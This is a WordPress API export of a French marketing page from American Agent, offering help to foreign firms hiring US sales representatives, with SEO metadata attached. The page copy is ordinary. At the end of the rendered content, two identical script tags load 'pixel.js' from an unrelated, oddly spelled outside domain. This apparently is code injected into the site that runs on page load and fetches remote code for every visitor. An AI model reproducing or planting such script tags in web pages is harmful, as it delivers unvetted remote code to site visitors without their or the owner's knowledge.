{"id":3149,"date":"2014-08-16T07:17:35","date_gmt":"2014-08-16T07:17:35","guid":{"rendered":"https:\/\/americanagent.com\/sales-representative-search-2\/"},"modified":"2014-09-18T11:15:22","modified_gmt":"2014-09-18T15:15:22","slug":"recherche-de-representants-americains","status":"publish","type":"page","link":"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/","title":{"rendered":"Recherche de Repr\u00e9sentants Am\u00e9ricains"},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-4480d7a456ad7dbc8592c86d59d87829\">\n#top .av-special-heading.av-av_heading-4480d7a456ad7dbc8592c86d59d87829{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-4480d7a456ad7dbc8592c86d59d87829 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-4480d7a456ad7dbc8592c86d59d87829 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-4480d7a456ad7dbc8592c86d59d87829 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Besoin de trouver les meilleurs commerciaux am\u00e9ricains ?<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-5423793a0e82d2455362b4eba580b48d '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p><span style=\"color: #000000;\">Embaucher un commercial de votre secteur, digne de confiance, est une bonne fa\u00e7on d&#8217;aborder le march\u00e9 am\u00e9ricain.<\/span><\/p>\n<p><span style=\"color: #000000;\">Quelquefois la situation de nos clients requiert l&#8217;embauche imm\u00e9diate d&#8217;un tel repr\u00e9sentant. Comme tout autre recruteur ou chasseur de t\u00eates, nous sommes en mesure de trouver ici aux \u00c9tats-Unis le repr\u00e9sentant ou l&#8217;expert &#8211; dans toutes industries, de tous niveaux d&#8217;exp\u00e9rience et dans n&#8217;importe quelle zone cibl\u00e9e du pays, qui vous corresponde. Nous utilisons les m\u00eames ressources, cependant notre solution est beaucoup plus \u00e9conomique et de plus elle comprendre votre position et vos pr\u00e9occupations beaucoup mieux que les cabinets de recrutement locaux.<\/span><\/p>\n<p><span style=\"color: #000000;\">Nous sommes fiers de notre exp\u00e9rience et avons d\u00e9j\u00e0 aid\u00e9 beaucoup d&#8217;entreprises \u00e9trang\u00e8res \u00e0 trouver le candidat ideal. Nous pouvons chercher pour vous des professionnels qui prendront \u00e0 c\u0153ur votre r\u00e9ussite sur le sol am\u00e9ricain. <\/span><\/p>\n<p><span style=\"color: #000000;\">Les commerciaux am\u00e9ricains peuvent se montrer r\u00e9ticents avant de s&#8217;engager avec des entreprises \u00e9trang\u00e8res. Quelquefois les meilleurs candidats abandonnent lors des n\u00e9gociations finales, parce que leurs pr\u00e9occupations l\u00e9gitimes ne sont pas clairement comprises par l&#8217;entreprise qui les embauche. Nous pouvons vous aider \u00e0 les comprendre. Par exemple, il peut \u00eatre difficile pour une entreprise \u00e9trang\u00e8re d&#8217;appr\u00e9hender des conditions d&#8217;emploi sur le sol am\u00e9ricain comme l&#8217;assurance maladie ou les fonds de retraite.<\/span><\/p>\n<p><span style=\"color: #000000;\">Nous sommes dispos\u00e9s \u00e0 vous guider \u00e0 travers ces questions, afin de vous permettre d&#8217;atteindre un terrain d&#8217;entente avec votre repr\u00e9sentant potential. Nous savons convaincre les commerciaux en d\u00e9taillant les opportunit\u00e9s uniques \u00e0 travailler pour nos clients. Nous savons comment vous positionner de mani\u00e8re optimale et expliquer les avantages d&#8217;\u00eatre un de vos repr\u00e9sentants.<\/span><\/p>\n<p><span style=\"color: #000000;\">Si l&#8217;embauche d&#8217;un repr\u00e9sentant d\u00e9di\u00e9 est votre choix initial de strat\u00e9gie de vente, contactez-nous afin que nous puissions vous expliquer les d\u00e9tails de ce processus et quelles sont les \u00e9tapes \u00e0 suivre.<\/span><\/p>\n<p><span style=\"color: #000000;\">Ces projets peuvent varier en longueur et en port\u00e9e, en fonction du nombre de repr\u00e9sentants que vous souhaitez mettre en place, et si nous envisageons un seul ou plusieurs secteurs de march\u00e9 et\/ou regions.<\/span><\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":3,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3149","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Recherche de Repr\u00e9sentants Am\u00e9ricains - American Agent<\/title>\n<meta name=\"description\" content=\"Besoin de trouver les meilleurs commerciaux am\u00e9ricains? Comment travailler avec des VRP aux \u00c9tats-Unis. Recherche de Repr\u00e9sentants am\u00e9ricains. Ventes USA.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Recherche de Repr\u00e9sentants Am\u00e9ricains - American Agent\" \/>\n<meta property=\"og:description\" content=\"Besoin de trouver les meilleurs commerciaux am\u00e9ricains? Comment travailler avec des VRP aux \u00c9tats-Unis. Recherche de Repr\u00e9sentants am\u00e9ricains. Ventes USA.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-18T15:15:22+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-representants-americains\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-representants-americains\\\/\",\"name\":\"Recherche de Repr\u00e9sentants Am\u00e9ricains - American Agent\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:35+00:00\",\"dateModified\":\"2014-09-18T15:15:22+00:00\",\"description\":\"Besoin de trouver les meilleurs commerciaux am\u00e9ricains? Comment travailler avec des VRP aux \u00c9tats-Unis. Recherche de Repr\u00e9sentants am\u00e9ricains. Ventes USA.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-representants-americains\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-representants-americains\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/recherche-de-representants-americains\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Recherche de Repr\u00e9sentants Am\u00e9ricains\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Recherche de Repr\u00e9sentants Am\u00e9ricains - American Agent","description":"Besoin de trouver les meilleurs commerciaux am\u00e9ricains? Comment travailler avec des VRP aux \u00c9tats-Unis. Recherche de Repr\u00e9sentants am\u00e9ricains. Ventes USA.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/","og_locale":"fr_FR","og_type":"article","og_title":"Recherche de Repr\u00e9sentants Am\u00e9ricains - American Agent","og_description":"Besoin de trouver les meilleurs commerciaux am\u00e9ricains? Comment travailler avec des VRP aux \u00c9tats-Unis. Recherche de Repr\u00e9sentants am\u00e9ricains. Ventes USA.","og_url":"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-18T15:15:22+00:00","twitter_misc":{"Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/","url":"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/","name":"Recherche de Repr\u00e9sentants Am\u00e9ricains - American Agent","isPartOf":{"@id":"https:\/\/americanagent.com\/fr\/#website"},"datePublished":"2014-08-16T07:17:35+00:00","dateModified":"2014-09-18T15:15:22+00:00","description":"Besoin de trouver les meilleurs commerciaux am\u00e9ricains? Comment travailler avec des VRP aux \u00c9tats-Unis. Recherche de Repr\u00e9sentants am\u00e9ricains. Ventes USA.","breadcrumb":{"@id":"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/fr\/recherche-de-representants-americains\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Recherche de Repr\u00e9sentants Am\u00e9ricains"}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/fr\/#website","url":"https:\/\/americanagent.com\/fr\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/comments?post=3149"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/pages\/3149\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/fr\/wp-json\/wp\/v2\/media?parent=3149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}